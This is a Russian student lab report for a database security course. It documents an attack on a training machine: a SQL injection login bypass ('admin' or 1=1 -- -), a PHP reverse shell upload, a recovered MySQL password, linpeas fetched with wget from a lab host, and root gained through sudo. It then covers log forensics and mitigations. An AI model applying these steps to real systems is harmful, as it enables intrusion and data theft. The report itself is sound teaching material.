Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

лаба6

.docx
Скачиваний:
7
Добавлен:
06.09.2023
Размер:
2.41 Mб
Скачать

Федеральное государственное бюджетное образовательное учреждение

высшего профессионального образования

«ОМСКИЙ ГОСУДАРСТВЕННЫЙ ТЕХНИЧЕСКИЙ УНИВЕРСИТЕТ»

Кафедра «Комплексная защиты информации»

Лабораторная работа

по курсу «Безопасность систем баз данных»

Лабораторная работа №6

Выполнили:

Студенты 2-го курса

Принял:

Самотуга А.Е.

Омск 2023

3. Выполнить атаку с доставкой вредоносного ПО на жертву, с шагами выполнения либо на основе 1-й, либо 2-й модели. Цель атаки минимум - получить возможность доступа к ОС жертвы - вход под пользователем, управление, выполнение команд, собрать информацию о системе, БД (например, сохранить всю ее в файл) и передать файл обратно злоумышленнику.

Рисунок 1 Проверим ip на наличие открытых портов

На странице авторизации к сайту видим login.php предположим, что можно сделать sql иньекцию чтобы зайти сюда используем admin’ or 1=1 -- -

Рисунок 3 Успешно вошли

Рисунок 4Воспользуемся генератором shell скрипта на php для того чтобы получить удаленный доступ

Рисунок 5 Начнем прозванивать порт который мы указали в генераторе

Рисунок 6 Загрузим shell.php на сайт

4. Выполнить попытку подключения к БД, используя полученные ранее данные. При необходимости задействовать возможности по обходу защиты подключения к БД, подбор пароля.

Рисунок 7 Здесь bash выдает нам ошибку однако мы уже получили доступ к машине

Рисунок 8 получили информацию об открытых соединениях

Рисунок 9 Здесь мы можем увидеть настоящий пароль admin

Рисунок 10 Подключились к mysql с помощью пароля

Рисунок 11 Попробуем повысить наши привелегии

Рисунок 12 Загрузим скрипт linpease для анализа уязвимостей

Рисунок 13 Добавим скрипту +x для возможности его запуска

Рисунок 14 виды уязвимостей

Рисунок 14 Нашли пароль от рута

Рисунок 15 Вошли в аккаунт

Рисунок 16 вошли под рутом

5. Поиск следов: а) исследовать все следы в ОС (логи, реестр, ...) б) исследовать все следы в БД (логи, журналы) На основе поиска, сделать отчет с описанием всего, что удалось найти.

Рисунок 17 просмотр логов с сайта и аунтефикация

Рисунок 18 просмотр запущенных скриптов

Рисунок 19 Генеральный лог

Рисунок 20 История bash

Проанализировав всю полученную информация, можно сделать несколько выводов:

  1. Злоумышленник менял авторизацию под разными пользователями

  • www-data

  • mike

  • root

  1. Зашел в MySQL и узнал пароль от пользователя Admin в базе данных gallery_db в таблице users

  2. Использовал SQL-инъекцию admin' or 1=1 — - для обхода авторизации на веб-сайте

  3. Все вводимые злоумышленником команды, а именно:

  • wget 10.9.71.155/linpeas.sh

  • Chmod +X linpeas.sh

  • /linpeas.sh

  • Mysql –u root

  • Sudo –l

  • Sudo /bin/bash /opt/rootkit.sh

  1. Все запущенные скрипты, которыми пользовался злоумышленникoм

  • Linpeas.sh

  • Rootkit.sh

  1. Создание нового файла general_log.log в папке tmp, а также внесение в папку скрипта linpeas.sh

6. Описать механизм защиты от произведенной атаки, в т.ч.: меры,настройки, СЗИ, ... Те из них, которые возможно, применить к жертве.

В данной лабораторной работе была произведена атака в виде SQL-инъекции, которая позволила обойти авторизацию на веб-сайте.

Механизмы защиты от такого тип SQL-инъекций следующие:

  1. Нужно обеспечить проверку выходных данных, которые вводит пользователь, они должны быть проверены на наличие

  2. вредоносного кода

  3. Использования хеширования паролей, все пароли должны быть

  4. хешированы перед сохранением их в базе данных

  5. Ограничить права доступа к базе данных, разрешить использование БД только определенным пользователям

  6. Обновления СУБД, которые устраняют критические уязвимости

Для устранения данной угрозы была обеспечена проверка выходных данных, которые вводит пользователь

Рисунок 20 устраняем узявимость sql

Рисунок 21 проверка успешности устранения уязвимостей

Вывод: в ходе выполнения данной лабораторной работы мы пробросили vpn для установления связи с машиной, на которую была произведена атака. Также просканировали ее ip-адрес и узнали открытые порты. С помощью инъекции внедрились в машину жертвы. Зашли под правами супер пользователя и смогли подключится к базе данных и получить пароль от админа. Также просмотрели все файлы логов и установили антивирус для нежелательных приложений.

Соседние файлы в предмете Защита баз данных